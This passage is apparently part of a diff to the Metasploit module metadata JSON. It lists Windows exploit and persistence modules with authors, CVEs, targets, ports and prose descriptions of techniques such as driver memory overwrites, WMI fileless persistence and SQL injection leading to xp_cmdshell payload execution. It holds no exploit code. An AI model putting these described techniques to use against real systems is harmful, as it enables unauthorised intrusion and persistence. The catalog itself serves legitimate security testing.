Escalation", + "fullname": "exploit/windows/local/virtual_box_guest_additions", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-15", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within the VBoxGuest driver allows an attacker to inject memory they\n control into an arbitrary location they define. This can be used by an attacker to\n overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest\n Additions up to 4.3.10r93012.", + "references": [ + "CVE-2014-2477", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/virtual_box_guest_additions.rb", + "is_install_path": true, + "ref_name": "windows/local/virtual_box_guest_additions", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/virtual_box_opengl_escape": { + "name": "VirtualBox 3D Acceleration Virtual Machine Escape", + "fullname": "exploit/windows/local/virtual_box_opengl_escape", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-03-11", + "type": "exploit", + "author": [ + "Francisco Falcon", + "Florian Ledoux", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. 
This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.", + "references": [ + "CVE-2014-0983", + "BID-66133", + "URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities", + "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb", + "is_install_path": true, + "ref_name": "windows/local/virtual_box_opengl_escape", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/vss_persistence": { + "name": "Persistent Payload in Windows Volume Shadow Copy", + "fullname": "exploit/windows/local/vss_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-10-21", + "type": "exploit", + "author": [ + "Jedediah Rodriguez " + ], + "description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. 
In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.", + "references": [ + "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/", + "URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Windows" + ], + "mod_time": "2022-10-01 17:54:59 +0000", + "path": "/modules/exploits/windows/local/vss_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/vss_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/webexec": { + "name": "WebEx Local Service Permissions Exploit", + "fullname": "exploit/windows/local/webexec", + "aliases": [], + "rank": 400, + "disclosure_date": "2018-10-09", + "type": "exploit", + "author": [ + "Jeff McJunkin " + ], + "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/webexec.rb", + "is_install_path": true, + "ref_name": "windows/local/webexec", + "check": true, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/win_error_cve_2023_36874": { + "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/win_error_cve_2023_36874", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-07-11", + "type": "exploit", + "author": [ + "Filip Dragović (Wh04m1001)", + "Octoberfest7", + "bwatters-r7" + ], + "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n parser. If you open a report, Windows uses a relative path to locate the rendering program.\n By creating a specific alternate directory structure, we can coerce Windows into opening an\n arbitrary executable as SYSTEM.\n If the current user is a local admin, the system will attempt impersonation and the exploit will\n fail.", + "references": [ + "CVE-2023-36874", + "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/", + "URL-https://github.com/Wh04m1001/CVE-2023-36874", + "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-09-27 09:43:32 +0000", + "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb", + "is_install_path": true, + "ref_name": "windows/local/win_error_cve_2023_36874", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/windscribe_windscribeservice_priv_esc": { + "name": "Windscribe WindscribeService Named Pipe Privilege 
Escalation", + "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-05-24", + "type": "exploit", + "author": [ + "Emin Ghuliev", + "bcoles " + ], + "description": "The Windscribe VPN client application for Windows makes use of a\n Windows service `WindscribeService.exe` which exposes a named pipe\n `\\.\\pipe\\WindscribeService` allowing execution of programs with\n elevated privileges.\n\n Windscribe versions prior to 1.82 do not validate user-supplied\n program names, allowing execution of arbitrary commands as SYSTEM.\n\n This module has been tested successfully on Windscribe versions\n 1.80 and 1.81 on Windows 7 SP1 (x64).", + "references": [ + "CVE-2018-11479", + "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html", + "URL-https://pastebin.com/eLG3dpYK" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/windscribe_windscribeservice_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/wmi": { + "name": "Windows Management Instrumentation (WMI) Remote Command Execution", + "fullname": "exploit/windows/local/wmi", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. 
Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/exploits/windows/local/wmi.rb", + "is_install_path": true, + "ref_name": "windows/local/wmi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/wmi_persistence": { + "name": "WMI Event Subscription Persistence", + "fullname": "exploit/windows/local/wmi_persistence", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-06", + "type": "exploit", + "author": [ + "Nick Tyrer <@NickTyrer>" + ], + "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). 
When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.", + "references": [ + "URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", + "URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-03-12 12:17:46 +0000", + "path": "/modules/exploits/windows/local/wmi_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/wmi_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/lotus/domino_http_accept_language": { + "name": "IBM Lotus Domino Web Server 
Accept-Language Stack Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_http_accept_language", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-05-20", + "type": "exploit", + "author": [ + "Fairuzan Roslan ", + "Earl Marcus klks " + ], + "description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.", + "references": [ + "CVE-2008-2240", + "OSVDB-45415", + "BID-29310", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", + "Lotus Domino 7.0 on Windows 2003 SP2 English(NX)", + "Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)", + "Lotus Domino 8.0 on Windows 2003 SP1 English(NX)", + "Lotus Domino 8.0 on Windows 2003 SP2 English(NX)", + "Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_http_accept_language", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/domino_icalendar_organizer": { + "name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_icalendar_organizer", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-14", + "type": "exploit", + "author": [ + "A. Plaskett", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. 
By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.", + "references": [ + "CVE-2010-3407", + "OSVDB-68040", + "ZDI-10-177", + "URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/", + "URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Domino 8.5 on Windows 2000 SP4", + "Lotus Domino 8.5 on Windows Server 2003 SP0", + "Lotus Domino 8.5 on Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_icalendar_organizer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/domino_sametime_stmux": { + "name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_sametime_stmux", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-05-21", + "type": "exploit", + "author": [ + "aushack ", + "riaf " + ], + "description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. 
Based on the exploit\n by Manuel Santamarina Suarez.", + "references": [ + "CVE-2008-2499", + "OSVDB-45610", + "BID-29328", + "ZDI-08-028" + ], + "platform": "Windows", + "arch": "x86", + "rport": 1533, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Sametime 7.5 on Windows Server 2000 SP4", + "Lotus Sametime 7.5 on Windows Server 2003 SP1", + "Lotus Sametime 7.5 on Windows Server 2003 SP2", + "Lotus Sametime 7.5.1 Windows Server 2003 SP2", + "Lotus Sametime 8.0.0 Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_sametime_stmux", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/lotusnotes_lzh": { + "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", + "fullname": "exploit/windows/lotus/lotusnotes_lzh", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-24", + "type": "exploit", + "author": [ + "binaryhouse.net", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. 
This vulnerability was\n discovered binaryhouse.net", + "references": [ + "CVE-2011-1213", + "OSVDB-72706", + "BID-48018", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", + "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", + "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb", + "is_install_path": true, + "ref_name": "windows/lotus/lotusnotes_lzh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/hummingbird_exceed": { + "name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow", + "fullname": "exploit/windows/lpd/hummingbird_exceed", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. 
This module has only been tested against Hummingbird\n Exceed v10 with SP5.", + "references": [ + "CVE-2005-1815", + "OSVDB-16957", + "BID-13788" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English SP0-SP4", + "Windows XP English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb", + "is_install_path": true, + "ref_name": "windows/lpd/hummingbird_exceed", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/niprint": { + "name": "NIPrint LPD Request Overflow", + "fullname": "exploit/windows/lpd/niprint", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-05", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. 
Inspired by\n Immunity's VisualSploit :-)", + "references": [ + "CVE-2003-1141", + "OSVDB-2774", + "BID-8968", + "URL-http://www.immunitysec.com/documentation/vs_niprint.html" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NIPrint3.EXE (TDS:0x3a045ff2)", + "Windows XP SP3", + "Windows 7 x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/niprint.rb", + "is_install_path": true, + "ref_name": "windows/lpd/niprint", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/saplpd": { + "name": "SAP SAPLPD 6.28 Buffer Overflow", + "fullname": "exploit/windows/lpd/saplpd", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2008-0621", + "OSVDB-41127", + "BID-27613" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SAPlpd 6.28.0.1 (SAP Release 6.40)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/saplpd.rb", + "is_install_path": true, + "ref_name": "windows/lpd/saplpd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/wincomlpd_admin": { + "name": "WinComLPD Buffer Overflow", + "fullname": "exploit/windows/lpd/wincomlpd_admin", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By 
sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2008-5159", + "OSVDB-42861", + "BID-27614" + ], + "platform": "Windows", + "arch": "", + "rport": 13500, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinComLPD 3.0.2.623" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb", + "is_install_path": true, + "ref_name": "windows/lpd/wincomlpd_admin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/achat_bof": { + "name": "Achat Unicode SEH Buffer Overflow", + "fullname": "exploit/windows/misc/achat_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-18", + "type": "exploit", + "author": [ + "Peter Kasza ", + "Balazs Bucsay " + ], + "description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. 
This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.", + "references": [ + "CWE-121" + ], + "platform": "Windows", + "arch": "", + "rport": 9256, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/achat_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/achat_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/actfax_raw_server_bof": { + "name": "ActFax 5.01 RAW Server Buffer Overflow", + "fullname": "exploit/windows/misc/actfax_raw_server_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "exploit", + "author": [ + "Craig Freyman", + "corelanc0d3r", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. 
This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).", + "references": [ + "OSVDB-89944", + "BID-57789", + "EDB-24467", + "URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ActFax 5.01 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/actfax_raw_server_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/agentxpp_receive_agentx": { + "name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", + "fullname": "exploit/windows/misc/agentxpp_receive_agentx", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-04-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. 
The address", + "references": [ + "CVE-2010-1318", + "OSVDB-63919", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867" + ], + "platform": "Windows", + "arch": "", + "rport": 705, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Helix Server v12 and v13 - master.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb", + "is_install_path": true, + "ref_name": "windows/misc/agentxpp_receive_agentx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ahsay_backup_fileupload": { + "name": "Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload", + "fullname": "exploit/windows/misc/ahsay_backup_fileupload", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-06-01", + "type": "exploit", + "author": [ + "Wietse Boonstra" + ], + "description": "This module exploits an authenticated insecure file upload and code\n execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute\n the upload credentials are needed, default on Ahsay Backup trial\n accounts are enabled so an account can be created.\n\n It can be exploited in Windows and Linux environments to get remote code\n execution (usualy as SYSTEM). This module has been tested successfully\n on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this\n flaw all connected clients can be configured to execute a command before\n the backup starts. 
Allowing an attacker to takeover even more systems\n and make it rain shells!\n\n Setting the CREATEACCOUNT to true will create a new account, this is\n enabled by default.\n If credeantials are known enter these and run the exploit.", + "references": [ + "CVE-2019-10267", + "URL-https://www.wbsec.nl/ahsay/", + "URL-http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x86", + "Linux x86" + ], + "mod_time": "2020-12-23 11:36:38 +0000", + "path": "/modules/exploits/windows/misc/ahsay_backup_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/misc/ahsay_backup_fileupload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/ais_esel_server_rce": { + "name": "AIS logistics ESEL-Server Unauth SQL Injection RCE", + "fullname": "exploit/windows/misc/ais_esel_server_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-03-27", + "type": "exploit", + "author": [ + "Manuel Feifel" + ], + "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be server listening on 5100 with TLS but the port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n An fixed version was created by AIS in September 2017. However most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload. 
You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2019-10123" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5099, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-06-10 11:44:55 +0000", + "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/ais_esel_server_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/allmediaserver_bof": { + "name": "ALLMediaServer 0.8 Buffer Overflow", + "fullname": "exploit/windows/misc/allmediaserver_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-04", + "type": "exploit", + "author": [ + "motaz reda ", + "modpr0be ", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused due to a boundary error within the handling of HTTP request.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. 
Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.", + "references": [ + "CVE-2017-17932", + "OSVDB-83889", + "EDB-19625" + ], + "platform": "Windows", + "arch": "", + "rport": 888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ALLMediaServer 0.8 / Windows XP SP3 - English", + "ALLMediaServer 0.8 / Windows 7 SP1 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/allmediaserver_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/allmediaserver_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/altiris_ds_sqli": { + "name": "Symantec Altiris DS SQL Injection", + "fullname": "exploit/windows/misc/altiris_ds_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-15", + "type": "exploit", + "author": [ + "Brett Moore", + "3v0lver" + ], + "description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. 
